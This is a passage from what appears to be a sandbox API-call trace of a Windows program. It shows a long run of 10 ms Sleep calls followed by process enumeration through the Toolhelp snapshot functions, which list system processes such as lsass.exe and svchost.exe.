(dwMilliseconds=0xa) [0262.297] Sleep (dwMilliseconds=0xa) [0262.311] Sleep (dwMilliseconds=0xa) [0262.357] Sleep (dwMilliseconds=0xa) [0262.380] Sleep (dwMilliseconds=0xa) [0262.450] Sleep (dwMilliseconds=0xa) [0262.543] Sleep (dwMilliseconds=0xa) [0262.604] Sleep (dwMilliseconds=0xa) [0262.752] Sleep (dwMilliseconds=0xa) [0262.845] Sleep (dwMilliseconds=0xa) [0262.922] Sleep (dwMilliseconds=0xa) [0262.968] Sleep (dwMilliseconds=0xa) [0263.079] Sleep (dwMilliseconds=0xa) [0263.204] Sleep (dwMilliseconds=0xa) [0263.296] Sleep (dwMilliseconds=0xa) [0263.349] Sleep (dwMilliseconds=0xa) [0263.453] Sleep (dwMilliseconds=0xa) [0263.544] Sleep (dwMilliseconds=0xa) [0263.608] Sleep (dwMilliseconds=0xa) [0263.791] Sleep (dwMilliseconds=0xa) [0263.935] Sleep (dwMilliseconds=0xa) [0264.082] Sleep (dwMilliseconds=0xa) [0264.190] Sleep (dwMilliseconds=0xa) [0264.301] Sleep (dwMilliseconds=0xa) [0264.389] Sleep (dwMilliseconds=0xa) [0264.420] Sleep (dwMilliseconds=0xa) [0264.434] Sleep (dwMilliseconds=0xa) [0264.450] Sleep (dwMilliseconds=0xa) [0264.498] Sleep (dwMilliseconds=0xa) [0264.566] Sleep (dwMilliseconds=0xa) [0264.621] Sleep (dwMilliseconds=0xa) [0264.732] Sleep (dwMilliseconds=0xa) [0264.814] Sleep (dwMilliseconds=0xa) [0264.867] Sleep (dwMilliseconds=0xa) [0265.015] Sleep (dwMilliseconds=0xa) [0265.060] Sleep (dwMilliseconds=0xa) [0265.109] Sleep (dwMilliseconds=0xa) [0265.169] Sleep (dwMilliseconds=0xa) [0265.263] Sleep (dwMilliseconds=0xa) [0265.356] Sleep (dwMilliseconds=0xa) [0265.559] Sleep (dwMilliseconds=0xa) [0265.611] Sleep (dwMilliseconds=0xa) [0265.664] Sleep (dwMilliseconds=0xa) [0265.787] Sleep (dwMilliseconds=0xa) [0265.859] Sleep (dwMilliseconds=0xa) [0265.919] Sleep (dwMilliseconds=0xa) [0266.029] Sleep (dwMilliseconds=0xa) [0266.124] Sleep (dwMilliseconds=0xa) [0266.203] Sleep (dwMilliseconds=0xa) [0266.228] Sleep (dwMilliseconds=0xa) [0266.273] Sleep (dwMilliseconds=0xa) [0266.330] Sleep (dwMilliseconds=0xa) [0266.373] Sleep (dwMilliseconds=0xa) [0266.411] Sleep (dwMilliseconds=0xa) [0266.438] Sleep (dwMilliseconds=0xa) [0266.450] Sleep (dwMilliseconds=0xa) [0266.479] Sleep (dwMilliseconds=0xa) [0266.524] Sleep (dwMilliseconds=0xa) [0266.578] Sleep (dwMilliseconds=0xa) [0266.617] Sleep (dwMilliseconds=0xa) [0266.693] Sleep (dwMilliseconds=0xa) [0266.766] Sleep (dwMilliseconds=0xa) [0266.804] Sleep (dwMilliseconds=0xa) [0266.906] Sleep (dwMilliseconds=0xa) [0266.925] Sleep (dwMilliseconds=0xa) [0267.028] Sleep (dwMilliseconds=0xa) [0267.076] Sleep (dwMilliseconds=0xa) [0267.158] Sleep (dwMilliseconds=0xa) [0267.217] Sleep (dwMilliseconds=0xa) [0267.296] Sleep (dwMilliseconds=0xa) [0267.387] Sleep (dwMilliseconds=0xa) [0267.452] Sleep (dwMilliseconds=0xa) [0267.534] Sleep (dwMilliseconds=0xa) [0267.611] Sleep (dwMilliseconds=0xa) [0267.631] Sleep (dwMilliseconds=0xa) [0267.671] Sleep (dwMilliseconds=0xa) [0267.766] Sleep (dwMilliseconds=0xa) [0267.924] Sleep (dwMilliseconds=0xa) [0268.062] Sleep (dwMilliseconds=0xa) [0268.215] Sleep (dwMilliseconds=0xa) [0268.267] Sleep (dwMilliseconds=0xa) [0268.277] Sleep (dwMilliseconds=0xa) [0268.348] Sleep (dwMilliseconds=0xa) [0268.418] Sleep (dwMilliseconds=0xa) [0268.481] Sleep (dwMilliseconds=0xa) [0268.574] Sleep (dwMilliseconds=0xa) [0268.668] Sleep (dwMilliseconds=0xa) [0268.730] Sleep (dwMilliseconds=0xa) [0268.780] Sleep (dwMilliseconds=0xa) [0268.802] Sleep (dwMilliseconds=0xa) [0268.856] Sleep (dwMilliseconds=0xa) [0268.949] Sleep (dwMilliseconds=0xa) [0269.080] Sleep (dwMilliseconds=0xa) [0269.172] Sleep (dwMilliseconds=0xa) [0269.283] Sleep (dwMilliseconds=0xa) [0269.332] Sleep (dwMilliseconds=0xa) [0269.362] Sleep (dwMilliseconds=0xa) [0269.410] Sleep (dwMilliseconds=0xa) [0269.501] Sleep (dwMilliseconds=0xa) [0269.593] Sleep (dwMilliseconds=0xa) [0269.687] Sleep (dwMilliseconds=0xa) [0269.773] Sleep (dwMilliseconds=0xa) [0269.844] Sleep (dwMilliseconds=0xa) [0269.925] Sleep (dwMilliseconds=0xa) [0270.056] Sleep (dwMilliseconds=0xa) [0270.219] Sleep (dwMilliseconds=0xa) [0270.323] Sleep (dwMilliseconds=0xa) [0270.393] Sleep (dwMilliseconds=0xa) [0270.472] Sleep (dwMilliseconds=0xa) [0270.568] Sleep (dwMilliseconds=0xa) [0270.611] Sleep (dwMilliseconds=0xa) [0270.621] Sleep (dwMilliseconds=0xa) [0270.670] Sleep (dwMilliseconds=0xa) [0270.692] Sleep (dwMilliseconds=0xa) [0270.764] Sleep (dwMilliseconds=0xa) [0270.856] Sleep (dwMilliseconds=0xa) [0270.938] Sleep (dwMilliseconds=0xa) [0271.028] Sleep (dwMilliseconds=0xa) [0271.081] Sleep (dwMilliseconds=0xa) [0271.147] Sleep (dwMilliseconds=0xa) [0271.180] Sleep (dwMilliseconds=0xa) [0271.252] Sleep (dwMilliseconds=0xa) [0271.424] Sleep (dwMilliseconds=0xa) [0271.525] Sleep (dwMilliseconds=0xa) [0271.628] Sleep (dwMilliseconds=0xa) [0271.734] Sleep (dwMilliseconds=0xa) [0271.779] Sleep (dwMilliseconds=0xa) [0271.832] Sleep (dwMilliseconds=0xa) [0271.878] Sleep (dwMilliseconds=0xa) [0271.933] Sleep (dwMilliseconds=0xa) [0272.048] Sleep (dwMilliseconds=0xa) [0272.146] Sleep (dwMilliseconds=0xa) [0272.191] Sleep (dwMilliseconds=0xa) [0272.265] Sleep (dwMilliseconds=0xa) [0272.338] Sleep (dwMilliseconds=0xa) [0272.389] Sleep (dwMilliseconds=0xa) [0272.438] Sleep (dwMilliseconds=0xa) [0272.610] Sleep (dwMilliseconds=0xa) [0272.759] Sleep (dwMilliseconds=0xa) [0272.825] Sleep (dwMilliseconds=0xa) [0272.937] Sleep (dwMilliseconds=0xa) [0272.982] Sleep (dwMilliseconds=0xa) [0273.059] Sleep (dwMilliseconds=0xa) [0273.106] Sleep (dwMilliseconds=0xa) [0273.159] Sleep (dwMilliseconds=0xa) [0273.218] Sleep (dwMilliseconds=0xa) [0273.268] Sleep (dwMilliseconds=0xa) [0273.323] Sleep (dwMilliseconds=0xa) [0273.391] Sleep (dwMilliseconds=0xa) [0273.432] Sleep (dwMilliseconds=0xa) [0273.479] Sleep (dwMilliseconds=0xa) [0273.534] Sleep (dwMilliseconds=0xa) [0273.612] Sleep (dwMilliseconds=0xa) [0273.712] Sleep (dwMilliseconds=0xa) [0273.819] Sleep (dwMilliseconds=0xa) [0273.889] Sleep (dwMilliseconds=0xa) [0273.906] Sleep (dwMilliseconds=0xa) [0273.947] Sleep (dwMilliseconds=0xa) [0273.996] Sleep (dwMilliseconds=0xa) [0274.135] Sleep (dwMilliseconds=0xa) [0274.227] Sleep (dwMilliseconds=0xa) [0274.271] Sleep (dwMilliseconds=0xa) [0274.348] Sleep (dwMilliseconds=0xa) [0274.401] Sleep (dwMilliseconds=0xa) [0274.499] Sleep (dwMilliseconds=0xa) [0274.557] Sleep (dwMilliseconds=0xa) [0274.592] Sleep (dwMilliseconds=0xa) [0274.619] Sleep (dwMilliseconds=0xa) [0274.720] Sleep (dwMilliseconds=0xa) [0274.794] Sleep (dwMilliseconds=0xa) [0274.890] Sleep (dwMilliseconds=0xa) [0275.106] Sleep (dwMilliseconds=0xa) [0275.169] Sleep (dwMilliseconds=0xa) [0275.228] Sleep (dwMilliseconds=0xa) [0275.262] Sleep (dwMilliseconds=0xa) [0275.278] Sleep (dwMilliseconds=0xa) [0275.325] Sleep (dwMilliseconds=0xa) [0275.343] Sleep (dwMilliseconds=0xa) [0275.395] Sleep (dwMilliseconds=0xa) [0275.488] Sleep (dwMilliseconds=0xa) [0275.581] Sleep (dwMilliseconds=0xa) [0275.701] Sleep (dwMilliseconds=0xa) [0275.814] Sleep (dwMilliseconds=0xa) [0275.828] Sleep (dwMilliseconds=0xa) [0275.874] Sleep (dwMilliseconds=0xa) [0275.906] Sleep (dwMilliseconds=0xa) [0275.970] Sleep (dwMilliseconds=0xa) [0276.080] Sleep (dwMilliseconds=0xa) [0276.201] Sleep (dwMilliseconds=0xa) [0276.266] Sleep (dwMilliseconds=0xa) [0276.340] Sleep (dwMilliseconds=0xa) [0276.401] Sleep (dwMilliseconds=0xa) [0276.450] Sleep (dwMilliseconds=0xa) [0276.497] Sleep (dwMilliseconds=0xa) [0276.546] Sleep (dwMilliseconds=0xa) [0276.625] Sleep (dwMilliseconds=0xa) [0276.705] Sleep (dwMilliseconds=0xa) [0276.809] Sleep (dwMilliseconds=0xa) [0276.895] Sleep (dwMilliseconds=0xa) [0276.934] Sleep (dwMilliseconds=0xa) [0276.984] Sleep (dwMilliseconds=0xa) [0277.018] Sleep (dwMilliseconds=0xa) [0277.106] Sleep (dwMilliseconds=0xa) [0277.217] Sleep (dwMilliseconds=0xa) [0277.339] Sleep (dwMilliseconds=0xa) [0277.420] Sleep (dwMilliseconds=0xa) [0277.484] Sleep (dwMilliseconds=0xa) [0277.530] Sleep (dwMilliseconds=0xa) [0277.571] Sleep (dwMilliseconds=0xa) [0277.671] Sleep (dwMilliseconds=0xa) [0277.752] Sleep (dwMilliseconds=0xa) [0277.809] Sleep (dwMilliseconds=0xa) [0277.907] Sleep (dwMilliseconds=0xa) [0277.999] Sleep (dwMilliseconds=0xa) [0278.028] Sleep (dwMilliseconds=0xa) [0278.067] Sleep (dwMilliseconds=0xa) [0278.159] Sleep (dwMilliseconds=0xa) [0278.251] Sleep (dwMilliseconds=0xa) [0278.343] Sleep (dwMilliseconds=0xa) [0278.437] Sleep (dwMilliseconds=0xa) [0278.596] Sleep (dwMilliseconds=0xa) [0278.735] Sleep (dwMilliseconds=0xa) [0278.809] Sleep (dwMilliseconds=0xa) [0278.825] Sleep (dwMilliseconds=0xa) [0278.876] Sleep (dwMilliseconds=0xa) [0278.951] Sleep (dwMilliseconds=0xa) [0278.999] Sleep (dwMilliseconds=0xa) [0279.122] Sleep (dwMilliseconds=0xa) [0279.295] Sleep (dwMilliseconds=0xa) [0279.390] Sleep (dwMilliseconds=0xa) [0279.482] Sleep (dwMilliseconds=0xa) [0279.559] Sleep (dwMilliseconds=0xa) [0279.684] Sleep (dwMilliseconds=0xa) [0279.851] Sleep (dwMilliseconds=0xa) [0279.951] Sleep (dwMilliseconds=0xa) [0280.037] Sleep (dwMilliseconds=0xa) [0280.063] Sleep (dwMilliseconds=0xa) [0280.122] Sleep (dwMilliseconds=0xa) [0280.157] Sleep (dwMilliseconds=0xa) [0280.199] Sleep (dwMilliseconds=0xa) [0280.262] Sleep (dwMilliseconds=0xa) [0280.357] Sleep (dwMilliseconds=0xa) [0280.399] Sleep (dwMilliseconds=0xa) [0280.436] Sleep (dwMilliseconds=0xa) [0280.466] Sleep (dwMilliseconds=0xa) [0280.481] Sleep (dwMilliseconds=0xa) [0280.609] Sleep (dwMilliseconds=0xa) [0280.732] Sleep (dwMilliseconds=0xa) [0280.838] Sleep (dwMilliseconds=0xa) [0281.003] Sleep (dwMilliseconds=0xa) [0281.129] Sleep (dwMilliseconds=0xa) [0281.173] Sleep (dwMilliseconds=0xa) [0281.184] Sleep (dwMilliseconds=0xa) [0281.234] Sleep (dwMilliseconds=0xa) [0281.276] Sleep (dwMilliseconds=0xa) [0281.376] Sleep (dwMilliseconds=0xa) [0281.454] Sleep (dwMilliseconds=0xa) [0281.504] Sleep (dwMilliseconds=0xa) [0281.617] Sleep (dwMilliseconds=0xa) [0281.723] Sleep (dwMilliseconds=0xa) [0281.784] Sleep (dwMilliseconds=0xa) [0281.875] Sleep (dwMilliseconds=0xa) [0282.153] Sleep (dwMilliseconds=0xa) [0282.205] Sleep (dwMilliseconds=0xa) [0282.320] Sleep (dwMilliseconds=0xa) [0282.425] Sleep (dwMilliseconds=0xa) [0282.520] Sleep (dwMilliseconds=0xa) [0282.588] Sleep (dwMilliseconds=0xa) [0282.671] Sleep (dwMilliseconds=0xa) [0282.764] Sleep (dwMilliseconds=0xa) [0282.817] Sleep (dwMilliseconds=0xa) [0282.913] Sleep (dwMilliseconds=0xa) [0283.003] Sleep (dwMilliseconds=0xa) [0283.097] Sleep (dwMilliseconds=0xa) [0283.190] Sleep (dwMilliseconds=0xa) [0283.395] Sleep (dwMilliseconds=0xa) [0283.455] Sleep (dwMilliseconds=0xa) [0283.503] Sleep (dwMilliseconds=0xa) [0283.595] Sleep (dwMilliseconds=0xa) [0283.656] Sleep (dwMilliseconds=0xa) [0283.733] Sleep (dwMilliseconds=0xa) [0283.825] Sleep (dwMilliseconds=0xa) [0283.871] Sleep (dwMilliseconds=0xa) [0283.933] Sleep (dwMilliseconds=0xa) [0283.971] Sleep (dwMilliseconds=0xa) [0284.002] Sleep (dwMilliseconds=0xa) [0284.048] Sleep (dwMilliseconds=0xa) [0284.112] Sleep (dwMilliseconds=0xa) [0284.188] Sleep (dwMilliseconds=0xa) [0284.296] Sleep (dwMilliseconds=0xa) [0284.404] Sleep (dwMilliseconds=0xa) [0284.510] Sleep (dwMilliseconds=0xa) [0284.538] Sleep (dwMilliseconds=0xa) [0284.559] Sleep (dwMilliseconds=0xa) [0284.606] Sleep (dwMilliseconds=0xa) [0284.623] Sleep (dwMilliseconds=0xa) [0284.671] Sleep (dwMilliseconds=0xa) [0284.762] Sleep (dwMilliseconds=0xa) [0284.843] Sleep (dwMilliseconds=0xa) [0284.903] Sleep (dwMilliseconds=0xa) [0285.002] Sleep (dwMilliseconds=0xa) [0285.035] Sleep (dwMilliseconds=0xa) [0285.063] Sleep (dwMilliseconds=0xa) [0285.106] Sleep (dwMilliseconds=0xa) [0285.122] Sleep (dwMilliseconds=0xa) [0285.148] Sleep (dwMilliseconds=0xa) [0285.215] Sleep (dwMilliseconds=0xa) [0285.310] Sleep (dwMilliseconds=0xa) [0285.392] Sleep (dwMilliseconds=0xa) [0285.437] Sleep (dwMilliseconds=0xa) [0285.513] Sleep (dwMilliseconds=0xa) [0285.618] Sleep (dwMilliseconds=0xa) [0285.706] Sleep (dwMilliseconds=0xa) [0285.794] Sleep (dwMilliseconds=0xa) [0285.937] Sleep (dwMilliseconds=0xa) [0285.996] Sleep (dwMilliseconds=0xa) [0286.090] Sleep (dwMilliseconds=0xa) [0286.178] Sleep (dwMilliseconds=0xa) [0286.236] Sleep (dwMilliseconds=0xa) [0286.297] Sleep (dwMilliseconds=0xa) [0286.410] Sleep (dwMilliseconds=0xa) [0286.541] Sleep (dwMilliseconds=0xa) [0286.622] Sleep (dwMilliseconds=0xa) [0286.734] Sleep (dwMilliseconds=0xa) [0286.826] Sleep (dwMilliseconds=0xa) [0286.877] Sleep (dwMilliseconds=0xa) [0286.934] Sleep (dwMilliseconds=0xa) [0287.033] Sleep (dwMilliseconds=0xa) [0287.086] Sleep (dwMilliseconds=0xa) [0287.136] Sleep (dwMilliseconds=0xa) [0287.227] Sleep (dwMilliseconds=0xa) [0287.306] Sleep (dwMilliseconds=0xa) [0287.413] Sleep (dwMilliseconds=0xa) [0287.458] Sleep (dwMilliseconds=0xa) [0287.496] Sleep (dwMilliseconds=0xa) [0287.533] Sleep (dwMilliseconds=0xa) [0287.560] Sleep (dwMilliseconds=0xa) [0287.614] Sleep (dwMilliseconds=0xa) [0287.695] Sleep (dwMilliseconds=0xa) [0287.749] Sleep (dwMilliseconds=0xa) [0287.819] Sleep (dwMilliseconds=0xa) [0287.886] Sleep (dwMilliseconds=0xa) [0287.975] Sleep (dwMilliseconds=0xa) [0288.105] Sleep (dwMilliseconds=0xa) [0288.122] Sleep (dwMilliseconds=0xa) [0288.173] Sleep (dwMilliseconds=0xa) [0288.229] Sleep (dwMilliseconds=0xa) [0288.271] Sleep (dwMilliseconds=0xa) [0288.357] Sleep (dwMilliseconds=0xa) [0288.446] Sleep (dwMilliseconds=0xa) [0288.528] Sleep (dwMilliseconds=0xa) [0288.563] Sleep (dwMilliseconds=0xa) [0288.600] Sleep (dwMilliseconds=0xa) [0288.625] Sleep (dwMilliseconds=0xa) [0288.700] Sleep (dwMilliseconds=0xa) [0288.769] Sleep (dwMilliseconds=0xa) [0288.818] Sleep (dwMilliseconds=0xa) [0288.880] Sleep (dwMilliseconds=0xa) [0288.944] Sleep (dwMilliseconds=0xa) [0288.988] Sleep (dwMilliseconds=0xa) [0289.092] Sleep (dwMilliseconds=0xa) [0289.164] Sleep (dwMilliseconds=0xa) [0289.212] Sleep (dwMilliseconds=0xa) [0289.386] Sleep (dwMilliseconds=0xa) [0289.434] Sleep (dwMilliseconds=0xa) [0289.483] Sleep (dwMilliseconds=0xa) [0289.578] Sleep (dwMilliseconds=0xa) [0289.639] Sleep (dwMilliseconds=0xa) [0289.715] Sleep (dwMilliseconds=0xa) [0289.809] Sleep (dwMilliseconds=0xa) [0289.863] Sleep (dwMilliseconds=0xa) [0289.891] Sleep (dwMilliseconds=0xa) [0289.934] Sleep (dwMilliseconds=0xa) [0289.953] Sleep (dwMilliseconds=0xa) [0289.974] Sleep (dwMilliseconds=0xa) [0290.078] Sleep (dwMilliseconds=0xa) [0290.162] Sleep (dwMilliseconds=0xa) [0290.218] Sleep (dwMilliseconds=0xa) [0290.310] Sleep (dwMilliseconds=0xa) [0290.362] Sleep (dwMilliseconds=0xa) [0290.454] Sleep (dwMilliseconds=0xa) [0290.486] Sleep (dwMilliseconds=0xa) [0290.575] Sleep (dwMilliseconds=0xa) [0290.645] Sleep (dwMilliseconds=0xa) [0290.700] Sleep (dwMilliseconds=0xa) [0290.794] Sleep (dwMilliseconds=0xa) [0290.827] Sleep (dwMilliseconds=0xa) [0290.842] Sleep (dwMilliseconds=0xa) [0290.871] Sleep (dwMilliseconds=0xa) [0290.918] Sleep (dwMilliseconds=0xa) [0290.968] Sleep (dwMilliseconds=0xa) [0291.014] Sleep (dwMilliseconds=0xa) [0291.106] Sleep (dwMilliseconds=0xa) [0291.184] Sleep (dwMilliseconds=0xa) [0291.209] Sleep (dwMilliseconds=0xa) [0291.252] Sleep (dwMilliseconds=0xa) [0291.293] Sleep (dwMilliseconds=0xa) [0291.359] Sleep (dwMilliseconds=0xa) [0291.409] Sleep (dwMilliseconds=0xa) [0291.497] Sleep (dwMilliseconds=0xa) [0291.571] Sleep (dwMilliseconds=0xa) [0291.637] Sleep (dwMilliseconds=0xa) [0291.692] Sleep (dwMilliseconds=0xa) [0291.747] Sleep (dwMilliseconds=0xa) [0291.843] Sleep (dwMilliseconds=0xa) [0291.890] Sleep (dwMilliseconds=0xa) [0291.981] Sleep (dwMilliseconds=0xa) [0292.075] Sleep (dwMilliseconds=0xa) [0292.135] Sleep (dwMilliseconds=0xa) [0292.206] Sleep (dwMilliseconds=0xa) [0292.278] Sleep (dwMilliseconds=0xa) [0292.421] Sleep (dwMilliseconds=0xa) [0292.484] Sleep (dwMilliseconds=0xa) [0292.586] Sleep (dwMilliseconds=0xa) [0292.663] Sleep (dwMilliseconds=0xa) [0292.715] Sleep (dwMilliseconds=0xa) [0292.736] Sleep (dwMilliseconds=0xa) [0292.828] Sleep (dwMilliseconds=0xa) [0292.923] Sleep (dwMilliseconds=0xa) [0292.967] Sleep (dwMilliseconds=0xa) [0293.012] Sleep (dwMilliseconds=0xa) [0293.106] Sleep (dwMilliseconds=0xa) [0293.145] Sleep (dwMilliseconds=0xa) [0293.171] Sleep (dwMilliseconds=0xa) [0293.216] Sleep (dwMilliseconds=0xa) [0293.231] Sleep (dwMilliseconds=0xa) [0293.325] Sleep (dwMilliseconds=0xa) [0293.420] Sleep (dwMilliseconds=0xa) [0293.497] Sleep (dwMilliseconds=0xa) [0293.567] Sleep (dwMilliseconds=0xa) [0293.625] Sleep (dwMilliseconds=0xa) [0293.641] Sleep (dwMilliseconds=0xa) [0293.652] Sleep (dwMilliseconds=0xa) [0293.734] Sleep (dwMilliseconds=0xa) [0293.809] Sleep (dwMilliseconds=0xa) [0293.903] Sleep (dwMilliseconds=0xa) [0293.955] Sleep (dwMilliseconds=0xa) [0294.046] Sleep (dwMilliseconds=0xa) [0294.110] Sleep (dwMilliseconds=0xa) [0294.193] Sleep (dwMilliseconds=0xa) [0294.265] Sleep (dwMilliseconds=0xa) [0294.315] Sleep (dwMilliseconds=0xa) [0294.434] Sleep (dwMilliseconds=0xa) [0294.519] Sleep (dwMilliseconds=0xa) [0294.549] Sleep (dwMilliseconds=0xa) [0294.596] Sleep (dwMilliseconds=0xa) [0294.687] Sleep (dwMilliseconds=0xa) [0294.737] Sleep (dwMilliseconds=0xa) [0294.784] Sleep (dwMilliseconds=0xa) [0294.826] Sleep (dwMilliseconds=0xa) [0294.890] Sleep (dwMilliseconds=0xa) [0294.981] Sleep (dwMilliseconds=0xa) [0295.048] Sleep (dwMilliseconds=0xa) [0295.062] Sleep (dwMilliseconds=0xa) [0295.112] Sleep (dwMilliseconds=0xa) [0295.271] Sleep (dwMilliseconds=0xa) [0295.328] Sleep (dwMilliseconds=0xa) [0295.420] Sleep (dwMilliseconds=0xa) [0295.469] Sleep (dwMilliseconds=0xa) [0295.480] Sleep (dwMilliseconds=0xa) [0295.562] Sleep (dwMilliseconds=0xa) [0295.689] Sleep (dwMilliseconds=0xa) [0295.735] Sleep (dwMilliseconds=0xa) [0295.794] Sleep (dwMilliseconds=0xa) [0295.887] Sleep (dwMilliseconds=0xa) Thread: id = 172 os_tid = 0x6f4 [0232.635] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0232.647] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.648] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0232.650] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0232.651] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.657] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0232.658] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.660] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0232.662] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0232.664] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0232.666] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.667] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.674] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0232.676] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.678] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.679] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.681] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.683] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.779] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.783] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.785] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0232.786] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0232.788] Process32Next (in: hSnapshot=0x17b0, 